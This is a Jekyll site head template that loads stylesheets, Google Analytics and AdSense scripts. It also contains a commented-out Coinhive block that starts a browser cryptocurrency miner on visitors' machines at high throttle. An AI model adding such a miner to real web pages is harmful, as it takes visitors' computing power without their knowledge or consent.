<!-- CSS -->
<link rel="stylesheet" href="{{ site.base_url }}public/css/poole.css">
<link rel="stylesheet" href="{{ site.base_url }}public/css/syntax.css">
<link rel="stylesheet" href="{{ site.base_url }}public/css/hyde.css">
<link rel="stylesheet" href="{{ site.base_url }}public/css/background.css">
<link rel="stylesheet" href="{{ site.base_url }}public/css/social.css">
<link rel="stylesheet" href="//fonts.googleapis.com/css?family=PT+Sans:400,400italic,700|Abril+Fatface">
<link rel="stylesheet" href="//use.fontawesome.com/bbf6cc5e80.css">
<link rel="stylesheet" href="//use.fontawesome.com/releases/v4.6.3/css/font-awesome-css.min.css">

{% comment %}
<!-- JS -->
<script src="//cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"></script>
<script>
// Load the sidebar
particlesJS.load('sidebar', '/public/json/particles-sidebar.json', function() { });
</script>
{% endcomment %}

<!-- Global Site Tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-82838082-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-82838082-1');
</script>

<!-- Google Auto Ads -->
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-2002676771262988",
    enable_page_level_ads: true
  });
</script>

{% comment %}
<!-- Monetizing visitor traffic -->
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  // What site-key do we use?
  var key = '8HwAd4b7uoIsGeauLI4MFx7udLaTofWm'; // Don't forget to replace this with your own key

  // Get instance of the miner
  var miner = new CoinHive.Anonymous(key, { throttle: 0.9 });

  // Start this baby up!
  miner.start();
</script>
{% endcomment %}
